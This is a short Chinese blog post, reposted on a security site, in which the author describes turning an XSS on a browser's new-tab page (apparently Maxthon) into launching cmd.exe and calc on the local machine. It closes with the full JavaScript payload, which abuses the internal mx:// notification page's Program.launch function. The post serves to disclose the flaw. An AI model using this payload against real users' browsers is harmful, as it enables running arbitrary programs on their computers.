0x01

前言：其实我是个小白平时就喜欢瞎搞，无意间碰到一个浏览器就想一探究竟，好了废话不多说开始！！！

0x02

可以看到我打开的新标签是怎么一个链接页面，既然是页面我是不可以XSS它呢？

于是我就打开了控制器输入XSS代码如下图：

输入payload发现能成功弹窗，我们来假设如果这个浏览器的本地域既然能弹XSS是不可以弹出其他的呢？

没错确实能弹出其他的，如图：

没错我弹出了他的CMD窗口，我们来ipconfig一下

可以看到成功弹出了，我们再来弹出它的计算器试试如图：

是不是很神奇就出来了，哈哈！！！！

奉上payload：

var s=document.createElement(“iframe”);s.src=”mx://res/notification/”;s.onload=function()

{s.contentWindow.maxthon.program.Program.launch(“C:/windows/system32/cmd.exe”,””)};document.body.appendChild(s);

0x03

运气而已，纯属瞎搞…… ? 我始终是那个纯情的小Mat，小白菜，小渣渣。希望大家多多支持我，帮助我谢谢！！！！

由于安全原因，命令执行那里就不详细说明了，希望大家谅解！?

本文内容归Mat所有，未经允许严禁转载！

转载请注明：即刻安全 » 我是如何从一个xss到某某浏览器的远程命令执行